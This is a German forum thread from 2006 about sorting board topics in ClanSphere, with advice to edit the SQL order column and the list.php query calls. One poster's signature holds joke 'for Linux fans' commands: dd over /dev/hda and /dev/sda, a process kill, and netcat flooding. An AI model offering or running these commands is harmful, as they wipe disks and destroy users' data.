Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 6
Seite [1]
Melone


Rock the board





Beiträge: 46
# Thema - 10.10.2006 um 02:02 Uhr
Könnte mal jemand was machen, damit man Board Themen anders Sortieren kann, im Moment is das immer ein gewissen durcheinander, stört euch das auch?
Inaktiv
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 1 - 10.10.2006 um 04:47 Uhr
Kann mir jemand mein Auto anders lackieren? Mir gefällt die Farbe nicht oO

Du müsstest schon ein Beispiel schreiben was du genau meinst


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
Ho.B


King for a day



Herkunft: Berlin
Beiträge: 207
# Antwort: 2 - 10.10.2006 um 10:14 Uhr
der sprung vom forum zum auto ist aber schon ganz schon gewagt oder?


------------------
Alle Angaben sind wie immer ohne Gewähr

Inaktiv
|
Fr33z3m4n ClanSphere Team


Medal of Honor




Herkunft: Hamm
Beiträge: 11094
# Antwort: 3 - 10.10.2006 um 10:24 Uhr
Könnte mal jemand was machen, damit man Board Themen anders Sortieren kann, im Moment is das immer ein gewissen durcheinander, stört euch das auch?


Schau mal in deine SQL DB rein, unter categories, dort kannste schon eine Order Zahl eintragen. von 0-x

DesWeiteren musste dann nur unter

/mods/board/list.php
Zeile 15: (BXCP 0.3.2.2)
mehr... +-
 
1.
1. / 2. / ... 
 $bx_categories bx_sql_select(__FILE__,'categories',$select,$where,'categories_name',0,0);


ändern in:
 
1.
2.
1. / 2. / ... 
 
$bx_categories 
bx_sql_select(__FILE__,'categories',$select,$where,'categories_order',0,0);


Zeile 65: (BXCP 0.3.2.2)
 
1.
1. / 2. / ... 
 $bx_board bx_sql_select(__FILE__,'board',$select,$where,0,0,0);

ändern in

 
1.
1. / 2. / ... 
 $bx_board bx_sql_select(__FILE__,'board',$select,$where,'board_name',0,0);


------------------
mfg
Patrick "Fr33z3m4n" Jaskulski

Antoine de Saint-Exupéry: Wenn Du ein Schiff bauen willst, so trommle nicht Männer zusammen, um Holz zu beschaffen, Aufgaben zu verteilen, sondern lehre die Männer die Sehnsucht nach dem endlosen weiten Meer.

Zuletzt editiert von h0n1g am 10.10.2006 um 20:07 Uhr (1x Editiert)
Inaktiv
|
Cosmo


Beginner




Beiträge: 17
# Antwort: 4 - 10.10.2006 um 18:37 Uhr
Gut einige werden jetzt wahrscheinlich lachen aber, was zum Teufel ist eine SQl DB (Datenbank?) und wo finde ich die?


Inaktiv
|
Fr33z3m4n ClanSphere Team


Medal of Honor




Herkunft: Hamm
Beiträge: 11094
# Antwort: 5 - 10.10.2006 um 18:45 Uhr
Schau mal in die Unterlagen von deinem Webspace, die du von deinem Anbieter erhalten hast. Dort sollte zumindest ein Link für "phpMyAdmin" vorhanden sein.

SQL ist die Datenbank wo alle Informationen (Artikels, Forenbeiträge, User, Wars .....) gespeichert werden.


------------------
mfg
Patrick "Fr33z3m4n" Jaskulski

Antoine de Saint-Exupéry: Wenn Du ein Schiff bauen willst, so trommle nicht Männer zusammen, um Holz zu beschaffen, Aufgaben zu verteilen, sondern lehre die Männer die Sehnsucht nach dem endlosen weiten Meer.

Inaktiv
|
Melone
Thread-Ersteller


Rock the board





Beiträge: 46
# Antwort: 6 - 10.10.2006 um 19:06 Uhr
Okay Fr33z3 danke für die schnelle, gute hilfe n1


Inaktiv
|
Antworten: 6
Seite [1]


Sie müssen sich registrieren, um zu antworten.